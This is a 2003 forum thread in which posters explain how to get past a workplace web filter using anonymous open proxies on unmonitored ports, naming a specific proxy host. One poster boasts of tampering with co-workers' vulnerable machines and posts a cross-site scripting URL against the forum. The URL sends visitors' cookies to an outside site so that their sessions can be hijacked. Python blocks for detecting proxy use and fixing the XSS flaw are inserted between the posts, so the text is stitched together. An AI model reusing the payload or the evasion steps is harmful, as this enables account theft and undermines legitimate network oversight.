
OK all you software gurus.......

Started by EX#996, February 27, 2003, 03:36:14 PM


EX#996

The internet Nazis at work decided to block all non-financial internet sites at work.   ::)  I know this is a software program and is not hardware related.  Any ideas on how to get around it?

Dawn   ???
Paul and Dawn Buxton

ecumike

#1
Dawn, what happens is your computer requests a URL, then the edge servers/firewall software checks it against a list and either passes that request onto the next router outside your CO.s or it returns some sort of "sorry, this URL has been blocked" message.

That's what happens here when you try and go to playboy.com (so I hear), they route your request to an internal server that loads the "dude you're stupid for trying to look at this stuff at work" message.

I'll send you some tricks tomorrow to try and get around it.

But remember, you don't know where they came from  ;)

sdiver68

MCRA Race School Instructor

EX#996

Quote: Dawn, what happens is your computer requests a URL, then the edge servers/firewall software checks it against a list and either passes that request onto the next router outside your CO.s or it returns some sort of "sorry, this URL has been blocked" message.

That's what happens here when you try and go to playboy.com (so I hear), they route your request to an internal server that loads the "dude you're stupid for trying to look at this stuff at work" message.

I'll send you some tricks tomorrow to try and get around it.

But remember, you don't know where they came from  ;)

That is exactly what it does.  I work 10 hour days in a call center.  This board is one of the ways I keep my sanity.  Any help would be appreciated.

If any one asks....

<Sgt Schultz's voice>  I know NOTHING!

Dawn   :)
Paul and Dawn Buxton

ecumike

#4
OK my test worked, I was able to access the above 'blocked' site from our CO.s network.

You have to install this small program on your computer though... can you do that at work?... can you get email w/ attachments at work?

How it works is that you are actually sending your request through a remote proxy server, and not your network's proxy server. Hence you bypass it. You can make it look like you are coming from ANY country in (edited rest)... umm... maybe I shouldn't be posting this kinda info on a public forum.  Let me know.

EX#996

Send it to my home e-mail address.  I will download it to a disc.  Plus, no evidence through my work e-mail.

Thanks!

buxton@frontiernet.net

Dawn   :)
Paul and Dawn Buxton

ecumike

#6
You've got mail. 8)
Actually Dawn you don't need special software, you can do it right from your browser. I just sent a second email with the 411.

OmniGLH

Hey Michael...

This sounds interesting.  Keep explaining how it works!

...or just send me a copy in my email and I'll figure it out myself  ;)

jptak@dls.net
Jim "Porcelain" Ptak

ecumike

#8
Basically, what this does, is it sends your request to the remote proxy server that you specify. THAT remote server goes and requests the URL that you want and returns the info/site to you... kinda like a middle man/concierge/go getter, etc... aka/used for {insert h8ck3r term here}

Where do you 'find' these remote anonymous open proxy servers to go through? well... the story ends here...  :-X  Let's just say you use the big library in the sky. ;)

ecumike

#9
OK you asked for it.. here goes...

You go to/request a Web site in your browser.
When you request www.yahoo.com, your browser, by default, is communicating on port 80 (the default port # for the HTTP protocol - think of it like a channel). It's saying... "talk through port 80 and find me the server named yahoo.com" and by default, yahoo's Web server is going to be speaking on port 80 also so it will hear your request and send you info.

Well your company is/could be listening for all traffic on that port, which is HTTP traffic, or 'requested Web sites'. So they know what you're doing and where you're going every time you click.

Through the multitude of software available, they can trap, filter, cache, monitor, bounce, log, etc... any and all Web page requests from all computers.... Unless of course you 'communicate' on a different port. (which they're not expecting)

So instead of communicating on the default port (80), you find an anonymous, open, HTTP proxy server, which has its own, different port for communication. This proxy server 'translates' your request from its 'special' port to the common port (80) for you.

Example: Say there's a proxy server - bpubl014.hgo.se - and the port is set to 3128.
You set/change your browser's HTTP proxy setting to that IP/server, and that port #.

Now when you request www.yahoo.com, your browser is going to send the request to bpubl014.hgo.se - AND - it's gonna do it on port 3128 instead of port 80. When the proxy server gets your request, it goes and gets your requested URL for you, but on PORT 80, b/c that's what all Web sites 'talk' on by default. It then receives the info from that site you requested, and sends it back to you on PORT 3128.

You've now just used a channel that is not being monitored (hopefully) and bypassed big bro. who's monitoring and filtering traffic on PORT 80. :)

In IE, on the menu, go to: TOOLS/...INTERNET OPTIONS/...CONNECTIONS. Then if you're on a LAN, select LAN SETTINGS at the bottom. If you're on Dialup, select the appropriate connection in the list, and then 'SETTINGS'.

There's a section in there for PROXY SERVER.. click on 'advanced' and change the HTTP fields to your remote proxy server that you 'found'.

Also.. this changes your IP address that gets sent to the Web site that you go to (aka IP spoofing). And yea, there are servers ALL over the world.

Jack's got some proof of me spoofing my info in his Web site stats log ;)

Also again, you will NOT be able to access any internal company sites (intranets), b/c you are bypassing your CO.s firewall/software/servers that route or keep internal requests inside the network.

Have fun.

ecumike

If you want to make a trip around the world and see just how fast the internet is for those guys in Japan. pop this one in..  211.7.65.225:80

Results from privay.net:
Hello!   Your IP address is 211.7.65.225
Your computer host name is dns.lpgc.or.jp

spyderchick

ecumike, you must subscribe to 2600.  :D I love that 'zine.
Alexa Krueger
Spyder Leatherworks
414.327.0967
www.spyderleatherworks.com
www.redflagfund.org
Do or do not, there is no "try".

ecumike

Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

sdiver68

What if your company has ports other than the common ones blocked?  i.e. HTTP, FTP, etc...  then the whole scheme does not work, no?

Also, what happens when the LAN administrator notices a surge in traffic on port 3128?

Not that they would typically look for that  :-/
MCRA Race School Instructor

spyderchick

Quote: Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  

ecumike

Well, if your employer is REAL tight and the LAN dudes are some of those control freaks, then sure if they also monitor port 8080, 20, 21, etc.. then yea, your data stream will get picked up by the filter.

But remember... PORT 80 is the default.. they really have no reason to monitor any other port for HTTP traffic, it would just be a crap shoot... there are thousands of PORTs.

3128 is an open/non-used port, as is 8080 and ANY port #s not listed below..
7, 9, 11, 13, 17, 19, 20, 21, 23, 25, 37, 39, 42, 43, 53, 67, 68, 69, 70, 79, 80, 88, 101, 102, 107, 109, 110, 111, 113, 117, 119, 123, 135, 137, 138, 139, 143, 158, 161, 162, 170, 179, 194, 213, 389, 443, 445, 464, 500, 512, 513, 513, 514, 515, 517, 518, 520, 525, 526, 530, 531, 532, 533, 540, 543, 544, 550, 556, 560, 561, 666, 749, 750, 1109, 1167, 1433, 1434, 1434, 1512, 1524, 1701, 1723, 1812, 1813, 2049, 2053, 9535

If you don't see a number listed above, you can make it up and use it as a port #... so ya see.. there are too many to filter them all. Also... the ports above are USED by other protocols and programs, it would take a significant amount of server to log/filter all those.

Suppose your CO. blocks Limewire so that employees aren't sucking up bandwidth to share and download MP3s. How do they do that?.. They can block the default port that LimeWire uses.. 6344. So what can you do?  Being a smart user, change the port # in the program.

You can make/create/use almost ANY number up to 5 digits. (I think..it's been a few years since I got my MCSE)
So like you could set it to 10443 if you want.

But yea, you're at the 'mercy' of the port that the proxy server that you find uses. If your admin HAPPENS to block that port.. then just find another server that uses a different port.
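For the question above about an administrator noticing port 3128, and the reply that port 80 is the only port worth watching, here is an added example (not code from any poster in this thread) of how a monitoring point can spot proxy use from the request line itself, whatever the port. A browser configured with a proxy sends the full URL as the request target (or `CONNECT host:port`), while a direct request to a web server carries only a path. The flow records, addresses and the sanctioned-proxy list are constructed for illustration.

```python
import re

# HTTP/1.x request line: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r?\n")

def classify_request(payload: bytes):
    """Return 'proxy', 'tunnel', 'origin', or None if not an HTTP/1.x request."""
    m = REQUEST_LINE.match(payload)
    if not m:
        return None
    method, target = m.group(1), m.group(2)
    if method == b"CONNECT":
        return "tunnel"   # authority-form: client asks a proxy to open a tunnel
    if target.lower().startswith((b"http://", b"https://")):
        return "proxy"    # absolute-form: what a browser sends to a configured proxy
    return "origin"       # origin-form ("/path"): direct request to a web server

def find_unsanctioned_proxy_use(flows, sanctioned_proxies):
    """flows: iterable of (client, dst_ip, dst_port, first_payload_bytes).
    Returns the flows that speak proxy-style HTTP to a destination that is
    not one of the organisation's own proxies, regardless of port number."""
    hits = []
    for client, dst_ip, dst_port, payload in flows:
        kind = classify_request(payload)
        if kind in ("proxy", "tunnel") and (dst_ip, dst_port) not in sanctioned_proxies:
            hits.append((client, dst_ip, dst_port, kind))
    return hits

# Constructed sample data (documentation address ranges, not real hosts).
SANCTIONED = {("10.0.0.5", 8080)}
SAMPLE_FLOWS = [
    ("10.1.1.20", "198.51.100.7", 80,
     b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("10.1.1.21", "10.0.0.5", 8080,
     b"GET http://www.example.com/ HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("10.1.1.22", "203.0.113.9", 3128,
     b"GET http://www.example.org/ HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
    ("10.1.1.23", "203.0.113.9", 3128,
     b"CONNECT www.example.org:443 HTTP/1.1\r\n\r\n"),
    ("10.1.1.24", "192.0.2.44", 80,   # external proxy listening on port 80
     b"GET http://www.example.net/ HTTP/1.0\r\n\r\n"),
    ("10.1.1.25", "192.0.2.50", 3128, b"\x16\x03\x01\x00\xa5"),  # not HTTP
]

if __name__ == "__main__":
    for hit in find_unsanctioned_proxy_use(SAMPLE_FLOWS, SANCTIONED):
        print(hit)
```

The port-80 record is flagged too, so a filter built this way does not depend on guessing which port a proxy listens on.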

ecumike

Quote: Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  


I read it:
A. B/C it really opens your eyes to what people can and are doing through computers
B. It makes you a less naive person when it comes to those sorts of things ("oh you can do that?")
C. I'm a Web developer and keep up on the latest and greatest hacks and tricks

OK the real reasons...
A. I like to screw with people/co-workers on the LAN who have vulnerabilities on their systems
B. I like to exploit viruses of those such people and see what I can actually do with their computer
C. It's cool shlt to read about, there's some smart mofo.s out there

Yes, I knew you did leather work.. just didn't know if there was some other work that you did that you read it for.

ecumike

Want to see a prime example...

A cross-site scripting vulnerability on this here board...
CLICK HERE

Or how's about this...
CLICK HERE

Not to scare anyone, b/c it doesn't EXACTLY work buuuutttt...
This one could send your Cookie info to my site, where it would get tagged in the Web stats log. I could then look it up, and when I go to this site (CCS BBS), I could send out YOUR cookie ID instead of mine, and then I'd be logged in as you.

This one isn't working b/c the BBS is not escaping the characters, but here WAS the example...

http://www.racemotorcycles.com/cgi-bin/board/YaBB.pl?board=ccs1;action=display;num=<Script>location%3d'http://santelia.org/index.shtml?Cookie%3d'%2b(document.Cracker)%3b</Script>



OK I'm done playing. :)
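The server-side fix for the kind of URL shown in the post above, as an added example that is not the board software's own code: treat `num` as a number, escape anything echoed back into the page, and mark the session cookie `HttpOnly` so page script cannot read it. The handler names, the cookie name and the rule that message numbers are plain decimal are assumptions; the sample query is constructed.

```python
import html
import re
from urllib.parse import unquote

NUM_RE = re.compile(r"\d{1,12}")  # assumption: message numbers are plain decimal

def parse_semicolon_query(query: str) -> dict:
    """Split a 'k=v;k=v' query string (the separator style of the board URL
    in the post above) and percent-decode keys and values."""
    params = {}
    for pair in query.split(";"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params

def render_display(query: str):
    """Hypothetical 'display' handler: returns (status, headers, body)."""
    params = parse_semicolon_query(query)
    num = params.get("num", "")
    headers = [("Content-Type", "text/html; charset=utf-8")]
    if not NUM_RE.fullmatch(num):
        # Reject the value, and escape it before it is reflected into HTML
        # so markup in the parameter is displayed as text, not executed.
        safe = html.escape(num, quote=True)
        return 400, headers, "<p>Invalid message number: %s</p>" % safe
    return 200, headers, "<p>Showing message %s</p>" % num

def session_cookie_header(session_id: str):
    """Set-Cookie header for a hypothetical session cookie. HttpOnly keeps the
    value out of document.cookie, so injected script cannot forward it."""
    if not re.fullmatch(r"[A-Za-z0-9]+", session_id):
        raise ValueError("unexpected characters in session id")
    return ("Set-Cookie", "session=%s; HttpOnly; Path=/" % session_id)

# Constructed sample query with markup in the num parameter.
SAMPLE_QUERY = "board=ccs1;action=display;num=%3Cscript%3Ealert(1)%3C/script%3E"

if __name__ == "__main__":
    print(render_display(SAMPLE_QUERY))
    print(render_display("board=ccs1;action=display;num=1046378174"))
    print(session_cookie_header("abc123"))
```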

spyderchick

Oh Mike, you are such a fart smeller! Gotta love computer "magic".

Yeah, 2600 is fun and informative.  More people should read it. No, I'm not an IT person, but like you, it's good to be informed about the bigger wider world out there. How many people know who Kevin Mitnick is, and would they care?


ecumike

And would you know that he was caught just 15 minutes down the road from where I live?

spyderchick

There's a little bit of Kevin in all of us.